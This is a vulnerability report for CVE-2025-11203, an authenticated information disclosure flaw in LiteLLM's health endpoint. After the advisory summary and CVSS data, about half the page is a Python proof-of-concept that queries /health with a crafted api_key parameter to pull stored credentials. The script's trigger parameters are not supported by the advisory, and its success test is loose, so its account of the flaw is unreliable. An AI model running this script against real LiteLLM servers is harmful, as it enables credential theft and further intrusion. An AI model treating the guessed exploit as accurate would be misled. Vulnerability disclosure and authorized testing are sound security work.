Security Vulnerability Report

CVE-2025-11203

Published: 2025-10-29 20:15:36
Last Modified: 2026-04-15 00:35:42

Description

LiteLLM Information health API_KEY Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of LiteLLM. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of the API_KEY parameter provided to the health endpoint. The issue results from exposing sensitive information to an unauthorized actor. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-26585.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N
Weakness: CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Configurations (Affected Products)

LiteLLM < 1.63.14-stable

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11203 PoC - LiteLLM Health API Information Disclosure
# Reference: ZDI-CAN-26585
import requests
import json

TARGET_URL = "http://target-litellm-server:4000"
API_KEY = "your-authenticated-api-key"  # Attacker needs low-privilege auth


def exploit_cve_2025_11203():
    """
    Exploit for LiteLLM Information Disclosure via Health API
    This PoC demonstrates how API_KEY parameter leaks sensitive credentials
    """
    headers = {
        "Authorization": f"Bearer {API_KEY}",
        "Content-Type": "application/json"
    }

    # The vulnerable endpoint - health API with API_KEY parameter
    vulnerable_endpoint = f"{TARGET_URL}/health"

    # Crafted request that triggers information disclosure
    # The API_KEY parameter in query causes sensitive data to be returned
    params = {
        "api_key": "test",  # This parameter triggers the leak
        "suppress": "false"
    }

    try:
        response = requests.get(
            vulnerable_endpoint,
            headers=headers,
            params=params,
            verify=False,
            timeout=10
        )

        print(f"Status Code: {response.status_code}")
        print(f"Response Headers: {json.dumps(dict(response.headers), indent=2)}")
        print(f"Response Body: {json.dumps(response.json(), indent=2)}")

        # Check if sensitive information is leaked in response
        if "api_key" in response.text.lower() or "key" in response.text.lower():
            print("[+] SUCCESS: Sensitive information disclosure detected!")
            print("[+] Extracted credentials may be used for further attacks")
            return True
        else:
            print("[-] No obvious information disclosure detected")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-11203 LiteLLM Information Disclosure PoC")
    print("=" * 60)
    exploit_cve_2025_11203()
```

References

https://docs.litellm.ai/release_notes/v1.63.14-stable (LiteLLM v1.63.14-stable release notes)
https://www.zerodayinitiative.com/advisories/ZDI-25-929/ (ZDI advisory ZDI-25-929)